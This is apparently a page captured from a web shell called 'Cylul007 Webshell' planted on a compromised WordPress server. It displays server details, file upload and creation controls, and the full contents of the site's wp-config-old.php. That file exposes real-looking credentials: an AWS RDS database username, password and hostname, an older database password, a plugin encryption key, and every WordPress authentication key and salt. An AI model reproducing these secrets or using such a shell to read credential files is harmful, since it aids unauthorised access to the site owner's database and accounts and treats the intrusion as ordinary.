Cylul007 Webshell
Uname
:
Linux ip-172-31-85-249 4.19.0-27-cloud-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64
PHP
:
7.4.16
on
fpm-fcgi
Time
:
26 Dec 2024 12:07:59
Path :
/
opt
/
bitnami
/
apps
/
wordpress
/
htdocs
/
File Upload :
New File
New Folder
Current File : /opt/bitnami/apps/wordpress/htdocs/wp-config-old.php
Download
HOME
<?php // BEGIN iThemes Security - Do not modify or remove this line // iThemes Security Config Details: 2 define( 'DISALLOW_FILE_EDIT', true ); // Disable File Editor - Security > Settings > WordPress Tweaks > File Editor // END iThemes Security - Do not modify or remove this line //Begin Really Simple SSL session cookie settings @ini_set('session.cookie_httponly', true); @ini_set('session.cookie_secure', true); @ini_set('session.use_only_cookies', true); //END Really Simple SSL cookie settings define( 'ITSEC_ENCRYPTION_KEY', 'Y34tIVgpSS5jdj5rW1gxPjZCJSpOMm4yQnE7XllWe2I8Nk1HbjBuRilrTGVwOVBfTF4yUTpDOCB1ezR9fTcsXQ==' ); define( 'WP_CACHE', true ); // Added by WP Rocket /** * The base configuration for WordPress * * The wp-config.php creation script uses this file during the * installation. You don't have to use the web site, you can * copy this file to "wp-config.php" and fill in the values. * * This file contains the following configurations: * * * MySQL settings * * Secret keys * * Database table prefix * * ABSPATH * * @link https://wordpress.org/support/article/editing-wp-config-php/ * * @package WordPress */ // ** MySQL settings - You can get this info from your web host ** // /** The name of the database for WordPress */ define( 'DB_NAME', 'bitnami_wordpress' ); /** MySQL database username */ //define( 'DB_USER', 'bn_wordpress' ); /** MySQL database password */ //define( 'DB_PASSWORD', 'bc770e9274' ); /** MySQL hostname */ //define( 'DB_HOST', 'localhost:3306' ); /** RDS MySQL database username */ define( 'DB_USER', 'admin' ); define( 'DB_PASSWORD', 'Q5YDHPdRxeGetIhNpS1k' ); //define( 'DB_HOST', 'aws-mysqlsite.cdoro3imnxct.us-east-1.rds.amazonaws.com:3306' ); /*Novo RDS */ //define( 'DB_HOST', 'aws-mysqlsite.cyjjon1xlehg.us-east-1.rds.amazonaws.com:3306' ); define( 'DB_HOST', 'aws-rds.ch6sguw8mw93.us-east-1.rds.amazonaws.com:3306' ); /** Database Charset to use in creating database tables. */ define( 'DB_CHARSET', 'utf8' ); /** The Database Collate type. Don't change this if in doubt. */ define( 'DB_COLLATE', '' ); /**#@+ * Authentication Unique Keys and Salts. * * Change these to different unique phrases! * You can generate these using the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service} * You can change these at any point in time to invalidate all existing cookies. This will force all users to have to log in again. * * @since 2.6.0 */ define('AUTH_KEY', '95a30823f0bb854778b1e94efa8dbe78c7cc7e8ad6a163a1051fb6c6ea6a90a9'); define('SECURE_AUTH_KEY', 'fc22c1ce12cc1ee8cc4513691616ecdcaf971939e4c3e844d21014ccc77ed3ed'); define('LOGGED_IN_KEY', 'b4eace4fa149719d93999cd89addf26377e644e666ba2ea68b36dcf54166d2d9'); define('NONCE_KEY', 'cb161239aa3fb27e55bd745520e428cce3b4efa3196160412fee0f16ff8da655'); define('AUTH_SALT', 'ea0fb1ccaa9014cc2987064fcff50edfed9080f061ecf7a246241b9fda4a2837'); define('SECURE_AUTH_SALT', '6f56dac1d9e5bf3fa6f2ce98eb880098c82100dd0aaca4192227a4314bba0636'); define('LOGGED_IN_SALT', 'e577030dbdb031ca4e96cb676bdaea616ed6a69aeaa8142107feee193196dcc4'); define('NONCE_SALT', 'ce9bdc6d59dda6ebafea59d28474477a1f3c6f0801cc8c2961c0ef215e9a9e5f'); /**#@-*/ /** * WordPress Database Table prefix. * * You can have multiple installations in one database if you give each * a unique prefix. Only numbers, letters, and underscores please! */ $table_prefix = 'wp_'; /** * For developers: WordPress debugging mode. * * Change this to true to enable the display of notices during development. * It is strongly recommended that plugin and theme developers use WP_DEBUG * in their development environments. * * For information on other constants that can be used for debugging, * visit the documentation. * * @link https://wordpress.org/support/article/debugging-in-wordpress/ */ define( 'WP_DEBUG', false ); // Added by WP Rocket /* That's all, stop editing! Happy publishing. */ define('FS_METHOD', 'direct'); /** * The WP_SITEURL and WP_HOME options are configured to access from any hostname or IP address. * If you want to access only from an specific domain, you can modify them. For example: * define('WP_HOME','http://example.com'); * define('WP_SITEURL','http://example.com'); * */ if ( defined( 'WP_CLI' ) ) { $_SERVER['HTTP_HOST'] = 'localhost'; } define('WP_SITEURL', 'http://' . $_SERVER['HTTP_HOST'] . '/'); define('WP_HOME', 'http://' . $_SERVER['HTTP_HOST'] . '/'); /** Absolute path to the WordPress directory. */ if ( ! defined( 'ABSPATH' ) ) { define( 'ABSPATH', __DIR__ . '/' ); } /** Sets up WordPress vars and included files. */ require_once ABSPATH . 'wp-settings.php'; define('WP_TEMP_DIR', '/opt/bitnami/apps/wordpress/tmp'); // Disable pingback.ping xmlrpc method to prevent Wordpress from participating in DDoS attacks // More info at: https://docs.bitnami.com/general/apps/wordpress/troubleshooting/xmlrpc-and-pingback/ if ( !defined( 'WP_CLI' ) ) { // remove x-pingback HTTP header add_filter('wp_headers', function($headers) { unset($headers['X-Pingback']); return $headers; }); // disable pingbacks add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['pingback.ping'] ); return $methods; }); add_filter( 'auto_update_translation', '__return_false' ); }
Copyright © 2018 - Powered By CytoXploit